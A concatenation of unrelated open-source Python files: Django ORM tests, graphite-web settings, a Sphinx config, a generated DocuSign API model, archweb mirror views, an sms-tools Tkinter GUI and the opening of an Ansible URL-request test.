self.george = Person.objects.create(name='George', person_country=self.usa)
self.jane = Person.objects.create(name='Jane', person_country=self.soviet_union)
self.mark = Person.objects.create(name='Mark', person_country=self.soviet_union)
self.sam = Person.objects.create(name='Sam', person_country=self.soviet_union)
# Creating Groups
self.kgb = Group.objects.create(name='KGB', group_country=self.soviet_union)
self.cia = Group.objects.create(name='CIA', group_country=self.usa)
self.republican = Group.objects.create(name='Republican', group_country=self.usa)
self.democrat = Group.objects.create(name='Democrat', group_country=self.usa)
def test_get_succeeds_on_multicolumn_match(self):
# Membership objects have access to their related Person if both
# country_ids match between them
membership = Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
person = membership.person
self.assertEqual((person.id, person.name), (self.bob.id, "Bob"))
def test_get_fails_on_multicolumn_mismatch(self):
        # Membership objects return a DoesNotExist error when there is no
# Person with the same id and country_id
membership = Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jane.id, group_id=self.cia.id)
self.assertRaises(Person.DoesNotExist, getattr, membership, 'person')
def test_reverse_query_returns_correct_result(self):
        # Creating a valid membership because it has the same country as the person
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
        # Creating an invalid membership because it has a different country than the person
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.bob.id,
group_id=self.republican.id)
self.assertQuerysetEqual(
self.bob.membership_set.all(), [
self.cia.id
],
attrgetter("group_id")
)
def test_query_filters_correctly(self):
        # Creating two valid memberships
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id, group_id=self.cia.id)
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jim.id,
            group_id=self.cia.id)
        # Creating an invalid membership
        Membership.objects.create(membership_country_id=self.soviet_union.id,
person_id=self.george.id, group_id=self.cia.id)
self.assertQuerysetEqual(
Membership.objects.filter(person__name__contains='o'), [
self.bob.id
],
attrgetter("person_id")
)
def test_reverse_query_filters_correctly(self):
timemark = datetime.datetime.utcnow()
timedelta = datetime.timedelta(days=1)
        # Creating two valid memberships
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id, date_joined=timemark - timedelta)
Membership.objects.create(
membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id, date_joined=timemark + timedelta)
# Creating an invalid membership
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.george.id,
group_id=self.cia.id, date_joined=timemark + timedelta)
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gte=timemark), [
'Jim'
],
attrgetter('name')
)
def test_forward_in_lookup_filters_correctly(self):
Membership.objects.create(membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id)
Membership.objects.create(membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id)
# Creating an invalid membership
Membership.objects.create(
membership_country_id=self.soviet_union.id, person_id=self.george.id,
group_id=self.cia.id)
self.assertQuerysetEqual(
Membership.objects.filter(person__in=[self.george, self.jim]), [
self.jim.id,
],
attrgetter('person_id')
)
self.assertQuerysetEqual(
Membership.objects.filter(person__in=Person.objects.filter(name='Jim')), [
self.jim.id,
],
attrgetter('person_id')
)
def test_double_nested_query(self):
m1 = Membership.objects.create(membership_country_id=self.usa.id, person_id=self.bob.id,
group_id=self.cia.id)
m2 = Membership.objects.create(membership_country_id=self.usa.id, person_id=self.jim.id,
group_id=self.cia.id)
Friendship.objects.create(from_friend_country_id=self.usa.id, from_friend_id=self.bob.id,
to_friend_country_id=self.usa.id, to_friend_id=self.jim.id)
self.assertQuerysetEqual(Membership.objects.filter(
person__in=Person.objects.filter(
from_friend__in=Friendship.objects.filter(
to_friend__in=Person.objects.all()))),
[m1], lambda x: x)
self.assertQuerysetEqual(Membership.objects.exclude(
person__in=Person.objects.filter(
from_friend__in=Friendship.objects.filter(
to_friend__in=Person.objects.all()))),
[m2], lambda x: x)
def test_select_related_foreignkey_forward_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
Membership.objects.create(membership_country=self.usa, person=self.jim, group=self.democrat)
with self.assertNumQueries(1):
people = [m.person for m in Membership.objects.select_related('person').order_by('pk')]
normal_people = [m.person for m in Membership.objects.all().order_by('pk')]
self.assertEqual(people, normal_people)
def test_prefetch_foreignkey_forward_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
Membership.objects.create(membership_country=self.usa, person=self.jim, group=self.democrat)
with self.assertNumQueries(2):
people = [
m.person for m in Membership.objects.prefetch_related('person').order_by('pk')]
normal_people = [m.person for m in Membership.objects.order_by('pk')]
self.assertEqual(people, normal_people)
def test_prefetch_foreignkey_reverse_works(self):
Membership.objects.create(membership_country=self.usa, person=self.bob, group=self.cia)
        Membership.objects.create(membership_country=self.usa, person=self.jim, group=self.democrat)
g76r/graphite-web | webapp/graphite/settings.py | Python | apache-2.0 | 6,812 | 0.009689
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
# Django settings for graphite project.
# DO NOT MODIFY THIS FILE DIRECTLY - use local_settings.py instead
import sys, os
from os.path import abspath, dirname, join
from warnings import warn
GRAPHITE_WEB_APP_SETTINGS_LOADED = False
WEBAPP_VERSION = '0.10.0-alpha'
DEBUG = False
JAVASCRIPT_DEBUG = False
# Filesystem layout
WEB_DIR = dirname( abspath(__file__) )
WEBAPP_DIR = dirname(WEB_DIR)
GRAPHITE_ROOT = dirname(WEBAPP_DIR)
# Initialize additional path variables
# Defaults for these are set after local_settings is imported
CONTENT_DIR = ''
CSS_DIR = ''
CONF_DIR = ''
DASHBOARD_CONF = ''
GRAPHTEMPLATES_CONF = ''
STORAGE_DIR = ''
WHITELIST_FILE = ''
INDEX_FILE = ''
LOG_DIR = ''
CERES_DIR = ''
WHISPER_DIR = ''
RRD_DIR = ''
STANDARD_DIRS = []
# Cluster settings
CLUSTER_SERVERS = []
REMOTE_FIND_TIMEOUT = 3.0
REMOTE_FETCH_TIMEOUT = 6.0
REMOTE_RETRY_DELAY = 60.0
REMOTE_READER_CACHE_SIZE_LIMIT = 1000
CARBON_METRIC_PREFIX='carbon'
CARBONLINK_HOSTS = ["127.0.0.1:7002"]
CARBONLINK_TIMEOUT = 1.0
CARBONLINK_HASHING_KEYFUNC = None
CARBONLINK_RETRY_DELAY = 15
REPLICATION_FACTOR = 1
MEMCACHE_HOSTS = []
MEMCACHE_KEY_PREFIX = ''
FIND_CACHE_DURATION = 300
FIND_TOLERANCE = 2 * FIND_CACHE_DURATION
DEFAULT_CACHE_DURATION = 60 #metric data and graphs are cached for one minute by default
LOG_CACHE_PERFORMANCE = False
LOG_ROTATE = True
MAX_FETCH_RETRIES = 2
#Remote rendering settings
REMOTE_RENDERING = False #if True, rendering is delegated to RENDERING_HOSTS
RENDERING_HOSTS = []
REMOTE_RENDER_CONNECT_TIMEOUT = 1.0
LOG_RENDERING_PERFORMANCE = False
#Miscellaneous settings
SMTP_SERVER = "localhost"
DOCUMENTATION_URL = "http://graphite.readthedocs.org/"
ALLOW_ANONYMOUS_CLI = True
LOG_METRIC_ACCESS = False
LEGEND_MAX_ITEMS = 10
RRD_CF = 'AVERAGE'
STORAGE_FINDERS = (
'graphite.finders.standard.StandardFinder',
)
#Authentication settings
USE_LDAP_AUTH = False
LDAP_SERVER = "" # "ldapserver.mydomain.com"
LDAP_PORT = 389
LDAP_USE_TLS = False
LDAP_SEARCH_BASE = "" # "OU=users,DC=mydomain,DC=com"
LDAP_BASE_USER = "" # "CN=some_readonly_account,DC=mydomain,DC=com"
LDAP_BASE_PASS = "" # "my_password"
LDAP_USER_QUERY = "" # "(username=%s)" For Active Directory use "(sAMAccountName=%s)"
LDAP_URI = None
#Set this to True to delegate authentication to the web server
USE_REMOTE_USER_AUTHENTICATION = False
# Django 1.5 requires this so we set a default but warn the user
SECRET_KEY = 'UNSAFE_DEFAULT'
# Django 1.5 requires this to be set. Here we default to prior behavior and allow all
ALLOWED_HOSTS = [ '*' ]
# Override to link a different URL for login (e.g. for django_openid_auth)
LOGIN_URL = '/account/login'
# Set to True to require authentication to save or delete dashboards
DASHBOARD_REQUIRE_AUTHENTICATION = False
# Require Django change/delete permissions to save or delete dashboards.
# NOTE: Requires DASHBOARD_REQUIRE_AUTHENTICATION to be set
DASHBOARD_REQUIRE_PERMISSIONS = False
# Name of a group to which the user must belong to save or delete dashboards. Alternative to
# DASHBOARD_REQUIRE_PERMISSIONS, particularly useful when using only LDAP (without Admin app)
# NOTE: Requires DASHBOARD_REQUIRE_AUTHENTICATION to be set
DASHBOARD_REQUIRE_EDIT_GROUP = None
DATABASES = {
'default': {
'NAME': '/opt/graphite/storage/graphite.db',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
},
}
# If using rrdcached, set to the address or socket of the daemon
FLUSHRRDCACHED = ''
## Load our local_settings
try:
from graphite.local_settings import *
except ImportError:
print >> sys.stderr, "Could not import graphite.local_settings, using defaults!"
## Load Django settings if they werent picked up in local_settings
if not GRAPHITE_WEB_APP_SETTINGS_LOADED:
from graphite.app_settings import *
## Set config dependent on flags set in local_settings
# Path configuration
if not CONTENT_DIR:
CONTENT_DIR = join(WEBAPP_DIR, 'content')
if not CSS_DIR:
CSS_DIR = join(CONTENT_DIR, 'css')
if not CONF_DIR:
CONF_DIR = os.environ.get('GRAPHITE_CONF_DIR', join(GRAPHITE_ROOT, 'conf'))
if not DASHBOARD_CONF:
DASHBOARD_CONF = join(CONF_DIR, 'dashboard.conf')
if not GRAPHTEMPLATES_CONF:
GRAPHTEMPLATES_CONF = join(CONF_DIR, 'graphTemplates.conf')
if not STORAGE_DIR:
STORAGE_DIR = os.environ.get('GRAPHITE_STORAGE_DIR', join(GRAPHITE_ROOT, 'storage'))
if not WHITELIST_FILE:
WHITELIST_FILE = join(STORAGE_DIR, 'lists', 'whitelist')
if not INDEX_FILE:
INDEX_FILE = join(STORAGE_DIR, 'index')
if not LOG_DIR:
LOG_DIR = join(STORAGE_DIR, 'log', 'webapp')
if not WHISPER_DIR:
  WHISPER_DIR = join(STORAGE_DIR, 'whisper/')
if not CERES_DIR:
CERES_DIR = join(STORAGE_DIR, 'ceres/')
if not RRD_DIR:
RRD_DIR = join(STORAGE_DIR, 'rrd/')
if not STANDARD_DIRS:
try:
import whisper
if os.path.exists(WHISPER_DIR):
STANDARD_DIRS.append(WHISPER_DIR)
except ImportError:
print >> sys.stderr, "WARNING: whisper module could not be loaded, whisper support disabled"
try:
import rrdtool
if os.path.exists(RRD_DIR):
STANDARD_DIRS.append(RRD_DIR)
except ImportError:
pass
# Default sqlite db file
# This is set here so that a user-set STORAGE_DIR is available
if 'sqlite3' in DATABASES.get('default',{}).get('ENGINE','') \
and not DATABASES.get('default',{}).get('NAME'):
DATABASES['default']['NAME'] = join(STORAGE_DIR, 'graphite.db')
# Caching shortcuts
if MEMCACHE_HOSTS:
CACHES['default'] = {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': MEMCACHE_HOSTS,
'TIMEOUT': DEFAULT_CACHE_DURATION,
'KEY_PREFIX': MEMCACHE_KEY_PREFIX,
}
# Authentication shortcuts
if USE_LDAP_AUTH and LDAP_URI is None:
LDAP_URI = "ldap://%s:%d/" % (LDAP_SERVER, LDAP_PORT)
if USE_REMOTE_USER_AUTHENTICATION:
MIDDLEWARE_CLASSES += ('django.contrib.auth.middleware.RemoteUserMiddleware',)
AUTHENTICATION_BACKENDS.insert(0,'django.contrib.auth.backends.RemoteUserBackend')
if USE_LDAP_AUTH:
AUTHENTICATION_BACKENDS.insert(0,'graphite.account.ldapBackend.LDAPBackend')
if SECRET_KEY == 'UNSAFE_DEFAULT':
warn('SECRET_KEY is set to an unsafe default. This should be set in local_settings.py for better security')
gautsi/cRedditscore | docs/conf.py | Python | bsd-3-clause | 9,078 | 0.003855
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# cRedditscore documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# To get scipy to load for readthedocs:
class Mock(object):
def __init__(self, *args, **kwargs):
pass
def __call__(self, *args, **kwargs):
return Mock()
@classmethod
def __getattr__(cls, name):
if name in ('__file__', '__path__'):
return '/dev/null'
elif name[0] == name[0].upper():
return type(name, (), {})
else:
return Mock()
MOCK_MODULES = [
'scipy',
'sklearn',
'sklearn.naive_bayes',
'sklearn.feature_extraction',
]
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import cRedditscore
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cReddit score'
copyright = u'2015, Gautam Sisodia'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = cRedditscore.__version__
# The full version, including alpha/beta/rc tags.
release = cRedditscore.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
# keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cRedditscoredoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'cRedditscore.tex',
u'cReddit score Documentation',
u'Gautam Sisodia', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cRedditscore',
     u'cReddit score Documentation',
docusign/docusign-python-client | docusign_esign/models/app_store_product.py | Python | mit | 4,127 | 0.000242
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AppStoreProduct(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
      attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'market_place': 'str',
'product_id': 'str'
}
attribute_map = {
'market_place': 'marketPlace',
'product_id': 'productId'
}
def __init__(self, market_place=None, product_id=None): # noqa: E501
"""AppStoreProduct - a model defined in Swagger""" # noqa: E501
self._market_place = None
self._product_id = None
self.discriminator = None
if market_place is not None:
self.market_place = market_place
if product_id is not None:
self.product_id = product_id
@property
def market_place(self):
"""Gets the market_place of this AppStoreProduct. # noqa: E501
# noqa: E501
:return: The market_place of this AppStoreProduct. # noqa: E501
:rtype: str
"""
return self._market_place
@market_place.setter
def market_place(self, market_place):
"""Sets the market_place of this AppStoreProduct.
# noqa: E501
:param market_place: The market_place of this AppStoreProduct. # noqa: E501
:type: str
"""
self._market_place = market_place
@property
def product_id(self):
"""Gets the product_id of this AppStoreProduct. # noqa: E501
The Product ID from the AppStore. # noqa: E501
:return: The product_id of this AppStoreProduct. # noqa: E501
:rtype: str
"""
return self._product_id
@product_id.setter
def product_id(self, product_id):
"""Sets the product_id of this AppStoreProduct.
The Product ID from the AppStore. # noqa: E501
:param product_id: The product_id of this AppStoreProduct. # noqa: E501
:type: str
"""
self._product_id = product_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AppStoreProduct, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppStoreProduct):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
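# A minimal usage sketch (illustrative only, not part of the generated client);
# the marketplace and product id values below are made-up examples.
if __name__ == '__main__':
    product = AppStoreProduct(market_place='GooglePlay', product_id='com.example.app')
    assert product.to_dict() == {'market_place': 'GooglePlay', 'product_id': 'com.example.app'}
    print(product.to_str())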
|
pyropeter/archweb
|
mirrors/views.py
|
Python
|
gpl-2.0
| 4,912 | 0.003054 |
from django import forms
from django.db.models import Avg, Count, Max, Min, StdDev
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.simple import direct_to_template
from main.utils import make_choice
from .models import Mirror, MirrorUrl, MirrorProtocol
from .utils import get_mirror_statuses, get_mirror_errors
import datetime
from operator import attrgetter
class MirrorlistForm(forms.Form):
country = forms.MultipleChoiceField(required=False)
protocol = forms.MultipleChoiceField(required=False)
ip_version = forms.MultipleChoiceField(required=False,
label="IP version", choices=(('4','IPv4'), ('6','IPv6')))
use_mirror_status = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(MirrorlistForm, self).__init__(*args, **kwargs)
mirrors = Mirror.objects.filter(active=True).values_list(
'country', flat=True).distinct().order_by('country')
self.fields['country'].choices = [('all','All')] + make_choice(
mirrors)
self.fields['country'].initial = ['all']
protos = make_choice(
MirrorProtocol.objects.filter(is_download=True))
self.fields['protocol'].choices = protos
self.fields['protocol'].initial = [t[0] for t in protos]
self.fields['ip_version'].initial = ['4']
@csrf_exempt
def generate_mirrorlist(request):
if request.REQUEST.get('country', ''):
form = MirrorlistForm(data=request.REQUEST)
if form.is_valid():
countries = form.cleaned_data['country']
protocols = form.cleaned_data['protocol']
use_status = form.cleaned_data['use_mirror_status']
ipv4 = '4' in form.cleaned_data['ip_version']
ipv6 = '6' in form.cleaned_data['ip_version']
return find_mirrors(request, countries, protocols,
use_status, ipv4, ipv6)
else:
form = MirrorlistForm()
return direct_to_template(request, 'mirrors/index.html', {'mirrorlist_form': form})
def find_mirrors(request, countries=None, protocols=None, use_status=False,
ipv4_supported=True, ipv6_supported=True):
if not protocols:
protocols = MirrorProtocol.objects.filter(
is_download=True).values_list('protocol', flat=True)
qset = MirrorUrl.objects.select_related().filter(
protocol__protocol__in=protocols,
mirror__public=True, mirror__active=True, mirror__isos=True
)
if countries and 'all' not in countries:
qset = qset.filter(mirror__country__in=countries)
ip_version = Q()
if ipv4_supported:
ip_version |= Q(has_ipv4=True)
if ipv6_supported:
ip_version |= Q(has_ipv6=True)
qset = qset.filter(ip_version)
if not use_status:
urls = qset.order_by('mirror__country', 'mirror__name', 'url')
template = 'mirrors/mirrorlist.txt'
else:
status_info = get_mirror_statuses()
scores = dict([(u.id, u.score) for u in status_info['urls']])
urls = []
for u in qset:
u.score = scores[u.id]
if u.score and u.score < 100.0:
urls.append(u)
urls = sorted(urls, key=attrgetter('score'))
template = 'mirrors/mirrorlist_status.txt'
return direct_to_template(request, template, {
'mirror_urls': urls,
},
mimetype='text/plain')
def mirrors(request):
mirrors = Mirror.objects.select_related().order_by('tier', 'country')
if not request.user.is_authenticated():
mirrors = mirrors.filter(public=True, active=True)
    return direct_to_template(request, 'mirrors/mirrors.html',
{'mirror_list': mirrors})
def mirror_details(request, name):
mirror = get_object_or_404(Mirror, name=name)
if not request.user.is_authenticated() and \
(not mirror.public or not mirror.active):
# TODO: maybe this should be 403? but that would leak existence
raise Http404
return direct_to_template(request, 'mirrors/mirror_details.html',
{'mirror': mirror})
def status(request):
    bad_timedelta = datetime.timedelta(days=3)
status_info = get_mirror_statuses()
urls = status_info['urls']
good_urls = []
bad_urls = []
for url in urls:
# split them into good and bad lists based on delay
if not url.delay or url.delay > bad_timedelta:
bad_urls.append(url)
else:
good_urls.append(url)
context = status_info.copy()
context.update({
'good_urls': good_urls,
'bad_urls': bad_urls,
'error_logs': get_mirror_errors(),
})
return direct_to_template(request, 'mirrors/status.html', context)
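# Illustrative note on the views above: find_mirrors() assembles the IP filter
# by OR-ing Q objects together (an untouched empty Q() filters nothing out),
# and status() only partitions URLs around the three-day delay threshold
# rather than discarding the laggards.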
# vim: set ts=4 sw=4 et:
|
georgid/sms-tools
|
software/models_interface/dftModel_GUI_frame.py
|
Python
|
agpl-3.0
| 4,273 | 0.040019 |
# GUI frame for the dftModel_function.py
from Tkinter import *
import tkFileDialog, tkMessageBox
import sys, os
import pygame
from scipy.io.wavfile import read
import dftModel_function
class DftModel_frame:
def __init__(self, parent):
self.parent = parent
self.initUI()
pygame.init()
def initUI(self):
choose_label = "Input file (.wav, mono and 44100 sampling rate):"
        Label(self.parent, text=choose_label).grid(row=0, column=0, sticky=W, padx=5, pady=(10,2))
#TEXTBOX TO PRINT PATH OF THE SOUND FILE
self.filelocation = Entry(self.parent)
self.filelocation.focus_set()
self.filelocation["width"] = 25
self.filelocation.grid(row=1,column=0, sticky=W, padx=10)
self.filelocation.delete(0, END)
self.filelocation.insert(0, '../../sounds/piano.wav')
#BUTTON TO BROWSE SOUND FILE
self.open_file = Button(self.parent, text="Browse...", command=self.browse_file) #see: def browse_file(self)
self.open_file.grid(row=1, column=0, sticky=W, padx=(220, 6)) #put it beside the filelocation textbox
#BUTTON TO PREVIEW SOUND FILE
self.preview = Button(self.parent, text=">", command=self.preview_sound, bg="gray30", fg="white")
self.preview.grid(row=1, column=0, sticky=W, padx=(306,6))
## DFT MODEL
#ANALYSIS WINDOW TYPE
wtype_label = "Window type:"
Label(self.parent, text=wtype_label).grid(row=2, column=0, sticky=W, padx=5, pady=(10,2))
self.w_type = StringVar()
self.w_type.set("blackman") # initial value
window_option = OptionMenu(self.parent, self.w_type, "rectangular", "hanning", "hamming", "blackman", "blackmanharris")
window_option.grid(row=2, column=0, sticky=W, padx=(95,5), pady=(10,2))
#WINDOW SIZE
M_label = "Window size (M):"
Label(self.parent, text=M_label).grid(row=3, column=0, sticky=W, padx=5, pady=(10,2))
self.M = Entry(self.parent, justify=CENTER)
self.M["width"] = 5
self.M.grid(row=3,column=0, sticky=W, padx=(115,5), pady=(10,2))
self.M.delete(0, END)
self.M.insert(0, "511")
#FFT SIZE
N_label = "FFT size (N) (power of two bigger than M):"
Label(self.parent, text=N_label).grid(row=4, column=0, sticky=W, padx=5, pady=(10,2))
self.N = Entry(self.parent, justify=CENTER)
self.N["width"] = 5
self.N.grid(row=4,column=0, sticky=W, padx=(270,5), pady=(10,2))
self.N.delete(0, END)
self.N.insert(0, "1024")
#TIME TO START ANALYSIS
time_label = "Time in sound (in seconds):"
Label(self.parent, text=time_label).grid(row=5, column=0, sticky=W, padx=5, pady=(10,2))
self.time = Entry(self.parent, justify=CENTER)
self.time["width"] = 5
self.time.grid(row=5, column=0, sticky=W, padx=(180,5), pady=(10,2))
self.time.delete(0, END)
self.time.insert(0, ".2")
#BUTTON TO COMPUTE EVERYTHING
self.compute = Button(self.parent, text="Compute", command=self.compute_model, bg="dark red", fg="white")
self.compute.grid(row=6, column=0, padx=5, pady=(10,15), sticky=W)
# define options for opening file
self.file_opt = options = {}
options['defaultextension'] = '.wav'
options['filetypes'] = [('All files', '.*'), ('Wav files', '.wav')]
options['initialdir'] = '../../sounds/'
options['title'] = 'Open a mono audio file .wav with sample frequency 44100 Hz'
def preview_sound(self):
filename = self.filelocation.get()
if filename[-4:] == '.wav':
fs, x = read(filename)
else:
tkMessageBox.showerror("Wav file", "The audio file must be a .wav")
return
if len(x.shape) > 1 :
tkMessageBox.showerror("Stereo file", "Audio file must be Mono not Stereo")
elif fs != 44100:
tkMessageBox.showerror("Sample Frequency", "Sample frequency must be 44100 Hz")
else:
sound = pygame.mixer.Sound(filename)
sound.play()
def browse_file(self):
self.filename = tkFileDialog.askopenfilename(**self.file_opt)
#set the text of the self.filelocation
self.filelocation.delete(0, END)
self.filelocation.insert(0,self.filename)
def compute_model(self):
try:
inputFile = self.filelocation.get()
window = self.w_type.get()
M = int(self.M.get())
N = int(self.N.get())
time = float(self.time.get())
dftModel_function.extractHarmSpec(inputFile, window, M, N, time)
except ValueError as errorMessage:
tkMessageBox.showerror("Input values error",errorMessage)
|
cchurch/ansible
|
test/units/module_utils/urls/test_Request.py
|
Python
|
gpl-3.0
| 14,937 | 0.001674 |
# -*- coding: utf-8 -*-
# (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import datetime
import os
from ansible.module_utils.urls import (Request, open_url, urllib_request, HAS_SSLCONTEXT, cookiejar, RequestWithMethod,
UnixHTTPHandler, UnixHTTPSConnection, httplib)
from ansible.module_utils.urls import SSLValidationHandler, HTTPSClientAuthHandler, RedirectHandlerFactory
import pytest
from mock import call
if HAS_SSLCONTEXT:
import ssl
@pytest.fixture
def urlopen_mock(mocker):
return mocker.patch('ansible.module_utils.urls.urllib_request.urlopen')
@pytest.fixture
def install_opener_mock(mocker):
return mocker.patch('ansible.module_utils.urls.urllib_request.install_opener')
def test_Request_fallback(urlopen_mock, install_opener_mock, mocker):
